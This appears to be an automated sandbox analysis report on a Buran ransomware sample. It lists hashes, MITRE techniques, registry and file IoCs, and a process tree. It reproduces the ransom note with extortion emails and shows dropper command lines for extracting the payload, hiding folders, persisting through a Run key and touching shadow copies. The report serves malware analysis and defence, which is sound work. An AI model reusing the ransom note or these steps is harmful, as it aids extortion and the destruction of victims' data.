buran | 4e0d1edb76747fd945b87dd18299298f0df719edbea946119d91db59a9b6527a

Analysis

max time kernel
159s
max time network
168s
platform
windows7_x64
resource
win7-en-20211208
submitted
06-03-2022 06:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4e0d1edb76747fd945b87dd18299298f0df719edbea946119d91db59a9b6527a.exe
Size

3.3MB
MD5

d18bf81dbc8acce488abd633d8058cf5
SHA1

1d6dcade355b4867e9435961655a9b9caa373528
SHA256

4e0d1edb76747fd945b87dd18299298f0df719edbea946119d91db59a9b6527a
SHA512

10a6b3994b1b0d37c9f3833e700baded6b89b0162078442b4de5a9747c23027d8943016c5941ba2e530ee5263b87c31a7714aa7bcb5051e5d63cf0a3cd88756f

Score

10^/10

buran evasion persistence ransomware upx

Malware Config

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note

!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. To be sure we have the decryptor and it works you can send an email: [email protected] and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? Write to email: [email protected] Reserved email: [email protected] Your personal ID: 8DE-654-A44 Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Emails

[email protected]

Signatures

Buran
Ransomware-as-a-service based on the VegaLocker family first identified in 2019.
ransomware buran
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Executes dropped EXE 4 IoCs

Processes:

15sp.exemesager43.exetaskeng.exetaskeng.exe

pid process

1156 15sp.exe
524 mesager43.exe
752 taskeng.exe
2044 taskeng.exe
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

pid	process
1156	15sp.exe
524	mesager43.exe
752	taskeng.exe
2044	taskeng.exe

UPX packed file 9 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\ssd\onset\mesager43.exe	upx
C:\ssd\onset\mesager43.exe	upx
\ssd\onset\mesager43.exe	upx
C:\ssd\onset\mesager43.exe	upx
\Users\Admin\AppData\Roaming\Microsoft\Windows\taskeng.exe	upx
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\taskeng.exe	upx
\Users\Admin\AppData\Roaming\Microsoft\Windows\taskeng.exe	upx
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\taskeng.exe	upx
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\taskeng.exe	upx

Loads dropped DLL 5 IoCs

Processes:

cmd.execmd.exemesager43.exe

pid process

1216 cmd.exe
1984 cmd.exe
1984 cmd.exe
524 mesager43.exe
524 mesager43.exe

pid	process
1216	cmd.exe
1984	cmd.exe
1984	cmd.exe
524	mesager43.exe
524	mesager43.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

mesager43.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run	mesager43.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\taskeng.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\taskeng.exe\" -start"	mesager43.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskeng.exe

description	ioc	process
File opened (read-only)	\??\O:	taskeng.exe
File opened (read-only)	\??\I:	taskeng.exe
File opened (read-only)	\??\H:	taskeng.exe
File opened (read-only)	\??\F:	taskeng.exe
File opened (read-only)	\??\Z:	taskeng.exe
File opened (read-only)	\??\U:	taskeng.exe
File opened (read-only)	\??\T:	taskeng.exe
File opened (read-only)	\??\A:	taskeng.exe
File opened (read-only)	\??\V:	taskeng.exe
File opened (read-only)	\??\J:	taskeng.exe
File opened (read-only)	\??\E:	taskeng.exe
File opened (read-only)	\??\M:	taskeng.exe
File opened (read-only)	\??\L:	taskeng.exe
File opened (read-only)	\??\B:	taskeng.exe
File opened (read-only)	\??\S:	taskeng.exe
File opened (read-only)	\??\R:	taskeng.exe
File opened (read-only)	\??\Q:	taskeng.exe
File opened (read-only)	\??\P:	taskeng.exe
File opened (read-only)	\??\N:	taskeng.exe
File opened (read-only)	\??\K:	taskeng.exe
File opened (read-only)	\??\G:	taskeng.exe
File opened (read-only)	\??\Y:	taskeng.exe
File opened (read-only)	\??\X:	taskeng.exe
File opened (read-only)	\??\W:	taskeng.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

4 geoiptool.com

flow	ioc
4	geoiptool.com

Drops file in Program Files directory 64 IoCs

Processes:

taskeng.exe

description	ioc	process
File opened for modification	C:\Program Files\AddNew.tmp	taskeng.exe
File opened for modification	C:\Program Files\DismountSelect.png	taskeng.exe
File opened for modification	C:\Program Files\LimitPublish.001.8DE-654-A44	taskeng.exe
File opened for modification	C:\Program Files\MergeDismount.DVR.8DE-654-A44	taskeng.exe
File opened for modification	C:\Program Files\UnblockMove.ico	taskeng.exe
File opened for modification	C:\Program Files\7-Zip\7zCon.sfx	taskeng.exe
File opened for modification	C:\Program Files\7-Zip\7zCon.sfx.8DE-654-A44	taskeng.exe
File opened for modification	C:\Program Files\ApproveSkip.otf	taskeng.exe
File opened for modification	C:\Program Files\ConnectMount.css.8DE-654-A44	taskeng.exe
File opened for modification	C:\Program Files\DismountUnpublish.crw.8DE-654-A44	taskeng.exe
File opened for modification	C:\Program Files\PublishWait.jpeg.8DE-654-A44	taskeng.exe
File opened for modification	C:\Program Files\PushAdd.css	taskeng.exe
File opened for modification	C:\Program Files\RenameSwitch.vbe	taskeng.exe
File opened for modification	C:\Program Files\RestoreSplit.jfif.8DE-654-A44	taskeng.exe
File opened for modification	C:\Program Files\SplitUnprotect.scf.8DE-654-A44	taskeng.exe
File opened for modification	C:\Program Files\SuspendShow.pot	taskeng.exe
File opened for modification	C:\Program Files\CheckpointRequest.TTS	taskeng.exe
File opened for modification	C:\Program Files\RedoDismount.M2V.8DE-654-A44	taskeng.exe
File opened for modification	C:\Program Files\ResolveUnprotect.wmv.8DE-654-A44	taskeng.exe
File opened for modification	C:\Program Files\UnlockMerge.xht	taskeng.exe
File opened for modification	C:\Program Files\7-Zip\7z.sfx.8DE-654-A44	taskeng.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.chm	taskeng.exe
File created	C:\Program Files\7-Zip\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	taskeng.exe
File opened for modification	C:\Program Files\CheckpointRequest.TTS.8DE-654-A44	taskeng.exe
File opened for modification	C:\Program Files\ResolveUnprotect.wmv	taskeng.exe
File opened for modification	C:\Program Files\RestoreSplit.jfif	taskeng.exe
File opened for modification	C:\Program Files\UndoWrite.m4v	taskeng.exe
File opened for modification	C:\Program Files\RemoveCopy.m4v.8DE-654-A44	taskeng.exe
File opened for modification	C:\Program Files\RevokePublish.odt	taskeng.exe
File opened for modification	C:\Program Files\UnlockMerge.xht.8DE-654-A44	taskeng.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.chm.8DE-654-A44	taskeng.exe
File opened for modification	C:\Program Files\DenyWrite.otf.8DE-654-A44	taskeng.exe
File opened for modification	C:\Program Files\MergeRevoke.emf.8DE-654-A44	taskeng.exe
File opened for modification	C:\Program Files\PushAdd.css.8DE-654-A44	taskeng.exe
File opened for modification	C:\Program Files\UnblockCompress.js	taskeng.exe
File opened for modification	C:\Program Files\7-Zip\7z.exe.8DE-654-A44	taskeng.exe
File opened for modification	C:\Program Files\DismountSelect.png.8DE-654-A44	taskeng.exe
File opened for modification	C:\Program Files\ImportRestore.xps	taskeng.exe
File opened for modification	C:\Program Files\ReceiveFormat.mov.8DE-654-A44	taskeng.exe
File opened for modification	C:\Program Files\RedoDismount.M2V	taskeng.exe
File opened for modification	C:\Program Files\SelectDebug.tif	taskeng.exe
File opened for modification	C:\Program Files\DebugConvertFrom.vsw	taskeng.exe
File opened for modification	C:\Program Files\DismountExpand.temp	taskeng.exe
File opened for modification	C:\Program Files\DismountUnpublish.crw	taskeng.exe
File opened for modification	C:\Program Files\HideRestart.wma	taskeng.exe
File opened for modification	C:\Program Files\RedoReceive.tiff	taskeng.exe
File opened for modification	C:\Program Files\RedoReceive.tiff.8DE-654-A44	taskeng.exe
File opened for modification	C:\Program Files\UpdateStart.wmv	taskeng.exe
File opened for modification	C:\Program Files\7-Zip\7zFM.exe	taskeng.exe
File opened for modification	C:\Program Files\AddNew.tmp.8DE-654-A44	taskeng.exe
File created	C:\Program Files\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	taskeng.exe
File opened for modification	C:\Program Files\ExportDisconnect.jtx	taskeng.exe
File opened for modification	C:\Program Files\ExportDisconnect.jtx.8DE-654-A44	taskeng.exe
File opened for modification	C:\Program Files\FindResume.tif	taskeng.exe
File opened for modification	C:\Program Files\ImportRestore.xps.8DE-654-A44	taskeng.exe
File opened for modification	C:\Program Files\LimitPublish.001	taskeng.exe
File opened for modification	C:\Program Files\UnprotectRestore.txt	taskeng.exe
File opened for modification	C:\Program Files\EditInvoke.dotm	taskeng.exe
File opened for modification	C:\Program Files\MergeDismount.DVR	taskeng.exe
File opened for modification	C:\Program Files\RestartRedo.pot.8DE-654-A44	taskeng.exe
File opened for modification	C:\Program Files\UndoWrite.m4v.8DE-654-A44	taskeng.exe
File opened for modification	C:\Program Files\ApproveSkip.otf.8DE-654-A44	taskeng.exe
File opened for modification	C:\Program Files\DenyWrite.otf	taskeng.exe
File opened for modification	C:\Program Files\SelectDebug.tif.8DE-654-A44	taskeng.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1756 1256 WerFault.exe notepad.exe
Delays execution with timeout.exe 4 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exe

pid process

1184 timeout.exe
1148 timeout.exe
956 timeout.exe
1044 timeout.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

836 vssadmin.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

1668 taskkill.exe
1444 taskkill.exe

pid	pid_target	process	target process
1756	1256	WerFault.exe	notepad.exe

pid	process
1184	timeout.exe
1148	timeout.exe
956	timeout.exe
1044	timeout.exe

pid	process
836	vssadmin.exe

pid	process
1668	taskkill.exe
1444	taskkill.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

taskeng.exemesager43.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	taskeng.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	taskeng.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	mesager43.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	mesager43.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	mesager43.exe

Suspicious use of AdjustPrivilegeToken 44 IoCs

Processes:

mesager43.exetaskkill.exetaskkill.exeWMIC.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	524	mesager43.exe
Token: SeDebugPrivilege	524	mesager43.exe
Token: SeDebugPrivilege	1444	taskkill.exe
Token: SeDebugPrivilege	1668	taskkill.exe
Token: SeIncreaseQuotaPrivilege	964	WMIC.exe
Token: SeSecurityPrivilege	964	WMIC.exe
Token: SeTakeOwnershipPrivilege	964	WMIC.exe
Token: SeLoadDriverPrivilege	964	WMIC.exe
Token: SeSystemProfilePrivilege	964	WMIC.exe
Token: SeSystemtimePrivilege	964	WMIC.exe
Token: SeProfSingleProcessPrivilege	964	WMIC.exe
Token: SeIncBasePriorityPrivilege	964	WMIC.exe
Token: SeCreatePagefilePrivilege	964	WMIC.exe
Token: SeBackupPrivilege	964	WMIC.exe
Token: SeRestorePrivilege	964	WMIC.exe
Token: SeShutdownPrivilege	964	WMIC.exe
Token: SeDebugPrivilege	964	WMIC.exe
Token: SeSystemEnvironmentPrivilege	964	WMIC.exe
Token: SeRemoteShutdownPrivilege	964	WMIC.exe
Token: SeUndockPrivilege	964	WMIC.exe
Token: SeManageVolumePrivilege	964	WMIC.exe
Token: 33	964	WMIC.exe
Token: 34	964	WMIC.exe
Token: 35	964	WMIC.exe
Token: SeIncreaseQuotaPrivilege	828	WMIC.exe
Token: SeSecurityPrivilege	828	WMIC.exe
Token: SeTakeOwnershipPrivilege	828	WMIC.exe
Token: SeLoadDriverPrivilege	828	WMIC.exe
Token: SeSystemProfilePrivilege	828	WMIC.exe
Token: SeSystemtimePrivilege	828	WMIC.exe
Token: SeProfSingleProcessPrivilege	828	WMIC.exe
Token: SeIncBasePriorityPrivilege	828	WMIC.exe
Token: SeCreatePagefilePrivilege	828	WMIC.exe
Token: SeBackupPrivilege	828	WMIC.exe
Token: SeRestorePrivilege	828	WMIC.exe
Token: SeShutdownPrivilege	828	WMIC.exe
Token: SeDebugPrivilege	828	WMIC.exe
Token: SeSystemEnvironmentPrivilege	828	WMIC.exe
Token: SeRemoteShutdownPrivilege	828	WMIC.exe
Token: SeUndockPrivilege	828	WMIC.exe
Token: SeManageVolumePrivilege	828	WMIC.exe
Token: 33	828	WMIC.exe
Token: 34	828	WMIC.exe
Token: 35	828	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

4e0d1edb76747fd945b87dd18299298f0df719edbea946119d91db59a9b6527a.exeWScript.execmd.exeWScript.execmd.exemesager43.exenotepad.exe

description	pid	process	target process
PID 1588 wrote to memory of 2044	1588	4e0d1edb76747fd945b87dd18299298f0df719edbea946119d91db59a9b6527a.exe	WScript.exe
PID 1588 wrote to memory of 2044	1588	4e0d1edb76747fd945b87dd18299298f0df719edbea946119d91db59a9b6527a.exe	WScript.exe
PID 1588 wrote to memory of 2044	1588	4e0d1edb76747fd945b87dd18299298f0df719edbea946119d91db59a9b6527a.exe	WScript.exe
PID 1588 wrote to memory of 2044	1588	4e0d1edb76747fd945b87dd18299298f0df719edbea946119d91db59a9b6527a.exe	WScript.exe
PID 2044 wrote to memory of 1216	2044	WScript.exe	cmd.exe
PID 2044 wrote to memory of 1216	2044	WScript.exe	cmd.exe
PID 2044 wrote to memory of 1216	2044	WScript.exe	cmd.exe
PID 2044 wrote to memory of 1216	2044	WScript.exe	cmd.exe
PID 1216 wrote to memory of 1156	1216	cmd.exe	15sp.exe
PID 1216 wrote to memory of 1156	1216	cmd.exe	15sp.exe
PID 1216 wrote to memory of 1156	1216	cmd.exe	15sp.exe
PID 1216 wrote to memory of 1156	1216	cmd.exe	15sp.exe
PID 1216 wrote to memory of 1044	1216	cmd.exe	timeout.exe
PID 1216 wrote to memory of 1044	1216	cmd.exe	timeout.exe
PID 1216 wrote to memory of 1044	1216	cmd.exe	timeout.exe
PID 1216 wrote to memory of 1044	1216	cmd.exe	timeout.exe
PID 1216 wrote to memory of 984	1216	cmd.exe	WScript.exe
PID 1216 wrote to memory of 984	1216	cmd.exe	WScript.exe
PID 1216 wrote to memory of 984	1216	cmd.exe	WScript.exe
PID 1216 wrote to memory of 984	1216	cmd.exe	WScript.exe
PID 1216 wrote to memory of 1184	1216	cmd.exe	timeout.exe
PID 1216 wrote to memory of 1184	1216	cmd.exe	timeout.exe
PID 1216 wrote to memory of 1184	1216	cmd.exe	timeout.exe
PID 1216 wrote to memory of 1184	1216	cmd.exe	timeout.exe
PID 984 wrote to memory of 1984	984	WScript.exe	cmd.exe
PID 984 wrote to memory of 1984	984	WScript.exe	cmd.exe
PID 984 wrote to memory of 1984	984	WScript.exe	cmd.exe
PID 984 wrote to memory of 1984	984	WScript.exe	cmd.exe
PID 1984 wrote to memory of 808	1984	cmd.exe	attrib.exe
PID 1984 wrote to memory of 808	1984	cmd.exe	attrib.exe
PID 1984 wrote to memory of 808	1984	cmd.exe	attrib.exe
PID 1984 wrote to memory of 808	1984	cmd.exe	attrib.exe
PID 1984 wrote to memory of 1148	1984	cmd.exe	timeout.exe
PID 1984 wrote to memory of 1148	1984	cmd.exe	timeout.exe
PID 1984 wrote to memory of 1148	1984	cmd.exe	timeout.exe
PID 1984 wrote to memory of 1148	1984	cmd.exe	timeout.exe
PID 1984 wrote to memory of 524	1984	cmd.exe	mesager43.exe
PID 1984 wrote to memory of 524	1984	cmd.exe	mesager43.exe
PID 1984 wrote to memory of 524	1984	cmd.exe	mesager43.exe
PID 1984 wrote to memory of 524	1984	cmd.exe	mesager43.exe
PID 524 wrote to memory of 752	524	mesager43.exe	taskeng.exe
PID 524 wrote to memory of 752	524	mesager43.exe	taskeng.exe
PID 524 wrote to memory of 752	524	mesager43.exe	taskeng.exe
PID 524 wrote to memory of 752	524	mesager43.exe	taskeng.exe
PID 524 wrote to memory of 1256	524	mesager43.exe	notepad.exe
PID 524 wrote to memory of 1256	524	mesager43.exe	notepad.exe
PID 524 wrote to memory of 1256	524	mesager43.exe	notepad.exe
PID 524 wrote to memory of 1256	524	mesager43.exe	notepad.exe
PID 524 wrote to memory of 1256	524	mesager43.exe	notepad.exe
PID 524 wrote to memory of 1256	524	mesager43.exe	notepad.exe
PID 524 wrote to memory of 1256	524	mesager43.exe	notepad.exe
PID 1256 wrote to memory of 1756	1256	notepad.exe	WerFault.exe
PID 1256 wrote to memory of 1756	1256	notepad.exe	WerFault.exe
PID 1256 wrote to memory of 1756	1256	notepad.exe	WerFault.exe
PID 1256 wrote to memory of 1756	1256	notepad.exe	WerFault.exe
PID 1984 wrote to memory of 1444	1984	cmd.exe	taskkill.exe
PID 1984 wrote to memory of 1444	1984	cmd.exe	taskkill.exe
PID 1984 wrote to memory of 1444	1984	cmd.exe	taskkill.exe
PID 1984 wrote to memory of 1444	1984	cmd.exe	taskkill.exe
PID 1984 wrote to memory of 1668	1984	cmd.exe	taskkill.exe
PID 1984 wrote to memory of 1668	1984	cmd.exe	taskkill.exe
PID 1984 wrote to memory of 1668	1984	cmd.exe	taskkill.exe
PID 1984 wrote to memory of 1668	1984	cmd.exe	taskkill.exe
PID 1984 wrote to memory of 1692	1984	cmd.exe	attrib.exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exe

pid process

808 attrib.exe
1692 attrib.exe

pid	process
808	attrib.exe
1692	attrib.exe

C:\Users\Admin\AppData\Local\Temp\4e0d1edb76747fd945b87dd18299298f0df719edbea946119d91db59a9b6527a.exe
"C:\Users\Admin\AppData\Local\Temp\4e0d1edb76747fd945b87dd18299298f0df719edbea946119d91db59a9b6527a.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1588

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ssd\onset\goodram.vbs"
2⤵
- Suspicious use of WriteProcessMemory
PID:2044

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ssd\onset\81ldp.bat" "
3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1216

C:\ssd\onset\15sp.exe
"15sp.exe" e -psion0811 01s.rar
4⤵
- Executes dropped EXE
PID:1156

C:\Windows\SysWOW64\timeout.exe
timeout 5
4⤵
- Delays execution with timeout.exe
PID:1044

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ssd\onset\Ztestram.vbs"
4⤵
- Suspicious use of WriteProcessMemory
PID:984

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ssd\onset\sata1.bat" "
5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1984

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\ssd\"
6⤵
